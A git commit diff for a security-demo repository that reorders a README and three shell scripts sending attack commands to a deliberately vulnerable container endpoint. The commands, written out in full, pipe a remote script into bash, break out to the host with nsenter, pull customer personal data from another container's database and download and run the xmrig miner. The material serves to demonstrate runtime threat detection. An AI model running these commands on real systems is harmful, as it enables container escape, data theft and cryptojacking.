Rearranged so the crypto-miner runs last

jasonumiker-sysdig · jasonumiker-sysdig · commit 4e9ba8b1625c · 2023-06-13T22:35:18.000+10:00
diff --git a/README.md b/README.md
@@ -37,10 +37,10 @@ The [security-playground-restricted.yaml](https://github.com/jasonumiker-sysdig/
 |1|allowed|blocked (by not running as root)|allowed|blocked (by not running as root)
 |2|allowed|blocked (by not running as root)|blocked|blocked (by not running as root)
 |3|allowed|blocked (by not running as root)|blocked|blocked (by not running as root)
-|4|allowed|allowed|blocked|blocked (by Container Drift)
+|4|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)
 |5|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)
 |6|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)
-|7|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)|allowed|blocked (by not running as root and no hostPID and no privileged securityContect)
+|7|allowed|allowed|blocked|blocked (by Container Drift)
 
 Run `cat example-curls.sh` to see what we are about to run. To run these against security-playground-restricted instead run `example-curls-restricted.sh`.
 
@@ -76,23 +76,7 @@ This triggers the:
 #### security-playground-restricted
 This will be blocked by our python app not being run as the root user, and therefore not having access to install packages with apt, in security-playground-restricted.
 
-### 4. Crypto Mining Example
-Here we are downloading popular crytpo miner cgminer and running it.
-
-This will fire several Rules including:
-* `Mailicious filenames written` and `Malicilous binary detected` from the `Sysdig Runtime Threat Intelligence` Managed Policy
-* `Drift Detection` from `Container Drift`
-* `Detect outbound connections to common miner pool ports` from the `Sysdig Runtime Threat Intelligence` Managed Policy
-* `Cryto Mining Detection` from `Machine Learning`
-
-NOTE: If you want to actually mine (needed to trigger a couple of the rules above) remove the --dry-run from the command in the curl
-
-NOTE: This example currently only works with Intel/AMD (not ARM including Apple M1/M2)
-
-#### security-playground-restricted
-This is the only example that still works with sysdig-playground-restricted as you don't need to be root to download and run the crypto miner. It can, however, be blocked by a Sysdig Container Drift Policy set to enforce/prevent the drift.
-
-### 5. Break out of our container and install crictl on the host/Node
+### 4. Break out of our container and install crictl on the host/Node
 
 As discussed above, given the parameters we have specified (run as root, hostPID, privileged) we are allowed to break out of our container/Linux namespace if we ask. You can do that with the tool `nsenter`. We use this to download and install `crictl`, the tool to manage the container runtime directly, on the Node outside the container. We'll leverage this command behind there in the following examples.
 
@@ -103,7 +87,7 @@ This will fire two Rules:
 #### security-playground-restricted
 This will be blocked by our python app not being run as the root user, and therefore not being root outside the container either in security-playground-restricted. It also would be blocked by not having hostPID and/or the privileged securityContext in the PodSpec.
 
-### 6. Break out of our container and interact with other containers via crictl
+### 5. Break out of our container and interact with other containers via crictl
 
 The `crictl` command is similar to the Docker CLI and allows you to directly manage the local container runtime (containerd) on the Node - bypassing Kubernetes which normally is how you'd manage it.
 
@@ -114,11 +98,27 @@ This will fire several the `The docker client is executed in a container` rule i
 #### security-playground-restricted
 This will be blocked by our python app not being run as the root user, and therefore not being root outside the container either in security-playground-restricted. It also would be blocked by not having hostPID and/or the privileged securityContext in the PodSpec.
 
-### 7. Run a command (a psql query) in another container on the same Node (that runs a PostgreSQL DB)
+### 6. Run a command (a psql query) in another container on the same Node (that runs a PostgreSQL DB)
 
 Finally let's exfiltrate some data by running a query within `psql` inside another container on the same host. Even if the database wasn't running within the container (maybe it is an AWS RDS instead) the application Pod needs to have the connection string/secret within it decrypted at runtime in order for *it* to connect. Which means if we can install/run the database client within that other container/Pod then this will still work.
 
 This will fire the  the `The docker client is executed in a container` rule in the `Sysdig Runtime Notable Events` Managed Policy twice (once for the `crictl ps` to find the container ID and another for the `crictl exec` that runs the `psql` command to extract the data).
 
 #### security-playground-restricted
 This will be blocked by our python app not being run as the root user, and therefore not being root outside the container either in security-playground-restricted. It also would be blocked by not having hostPID and/or the privileged securityContext in the PodSpec.
+
+### 7. Crypto Mining Example
+Here we are downloading popular crytpo miner cgminer and running it.
+
+This will fire several Rules including:
+* `Mailicious filenames written` and `Malicilous binary detected` from the `Sysdig Runtime Threat Intelligence` Managed Policy
+* `Drift Detection` from `Container Drift`
+* `Detect outbound connections to common miner pool ports` from the `Sysdig Runtime Threat Intelligence` Managed Policy
+* `Cryto Mining Detection` from `Machine Learning`
+
+NOTE: If you want to actually mine (needed to trigger a couple of the rules above) remove the --dry-run from the command in the curl. Also note that without the --dry-run that it will keep running until you kill the Pod!
+
+NOTE: This example currently only works with Intel/AMD (not ARM including Apple M1/M2)
+
+#### security-playground-restricted
+This is the only example that still works with sysdig-playground-restricted as you don't need to be root to download and run the crypto miner. It can, however, be blocked by a Sysdig Container Drift Policy set to enforce/prevent the drift.
diff --git a/example-curls-nodrift.sh b/example-curls-nodrift.sh
@@ -18,17 +18,17 @@ curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
 echo "3. Exploit installing nmap and running a scan"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
 
-echo "4. Exploit running a script to run a crypto miner"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
-
-echo "5. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
+echo "4. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl https://z9k65lokhn70.s3.amazonaws.com/install-crictl.sh | bash'
 
-echo "6. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
+echo "5. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
 
-echo "7. Exfil some data from another container running on the same Node"
+echo "6. Exfil some data from another container running on the same Node"
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
-curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+
+echo "7. Exploit running a script to run a crypto miner"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
diff --git a/example-curls-restricted.sh b/example-curls-restricted.sh
@@ -18,17 +18,17 @@ curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
 echo "3. Exploit installing nmap and running a scan"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
 
-echo "4. Exploit running a script to run a crypto miner"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
-
-echo "5. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
+echo "4. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl https://z9k65lokhn70.s3.amazonaws.com/install-crictl.sh | bash'
 
-echo "6. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
+echo "5. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
 
-echo "7. Exfil some data from another container running on the same Node"
+echo "6. Exfil some data from another container running on the same Node"
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
-curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+
+echo "7. Exploit running a script to run a crypto miner"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
diff --git a/example-curls.sh b/example-curls.sh
@@ -18,17 +18,17 @@ curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
 echo "3. Exploit installing nmap and running a scan"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
 
-echo "4. Exploit running a script to run a crypto miner"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
-
-echo "5. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
+echo "4. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl https://z9k65lokhn70.s3.amazonaws.com/install-crictl.sh | bash'
 
-echo "6. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
+echo "5. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
 
-echo "7. Exfil some data from another container running on the same Node"
+echo "6. Exfil some data from another container running on the same Node"
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
-curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
+
+echo "7. Exploit running a script to run a crypto miner"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
